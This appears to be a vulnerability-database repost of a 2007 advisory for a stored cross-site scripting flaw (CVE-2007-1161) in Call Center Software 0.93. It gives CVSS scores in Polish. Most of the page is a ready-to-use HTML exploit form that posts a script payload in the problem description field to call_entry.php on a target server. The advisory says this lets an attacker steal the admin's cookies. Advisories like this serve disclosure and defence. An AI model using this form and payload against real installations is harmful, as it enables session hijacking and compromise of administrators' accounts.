Call Center Software - Remote Xss Post Exploit -

2007.03.07
Credit: CorryL
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2007-1161
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

-=[--------------------ADVISORY-------------------]=- Call center 0,93 Author: CorryL [corryl80 (at) gmail (dot) com [email concealed]] -=[-----------------------------------------------]=- -=[+] Application: Call senter -=[+] Version: 0,93 -=[+] Vendor's URL: http://www.call-center-software.org/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.xoned.net -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. Call center software is one of the most important aspects of any call help center, being able to track and manage calls can be the key to high customer safisfacation. Our 100% free call center software solution is based on php and the mysql database. ..::[ Bug ]::.. An attacker exploiting this vulnerability is able steal the content the cookies of the consumer admin in fact the bug situated is on an request post then he remains memorized inside the database in attends him that the admin goes to read the content of the call ..::[Exploit]::.. <html> <head> <title>Call Center</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link rel="stylesheet" href="helpdesk.css" type="text/css"> </head> <body> <table bgcolor="#FFFFFF" width="100%"> <tr> <td align="center"> <form method="post" action="http://remote_server/path/call_entry.php"> <table border="0"> <tr> <th class="ttitle">Adding Call</th> </tr> <tr> <td> <table width="100%" border="0" cellspacing="0" cellpadding="3"> <tr> <td align="right">Name:</td><td align="left"><input type="text" name="name" Value="H4ck3r"size="30"></td> </tr> <tr> <td align="right">Phone:</td><td align="left"><input type="text" name="phone" value="111-555-555" size="20"></td> </tr> <tr> <td align="right">Department:</td> <td> <select name="department_id"> <option value="1">Problem</option> </select> </td> </tr> <tr> <td align="right">Issue Type:</td> <td> <select name="issue_id"> <option value="6">email</option> <option value="2">keyboard</option> <option value="3">monitor</option> <option value="5">mouse</option> <option value="4">network</option> <option value="8">password</option> <option value="7">word processing</option> </select> </td> </tr> <tr> <td align="right" valign="top">Xss Script Here :</td> <td align="left"><input type="text" name="problem_desc" value="<body onload=alert(1395499912)>" size="50"></td> </tr> <tr> <td></td><td><input type="submit" name="submit" value="Add" class="button"></td> </tr> </table> </td> </tr> </table> </form> </td> </tr> </table> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top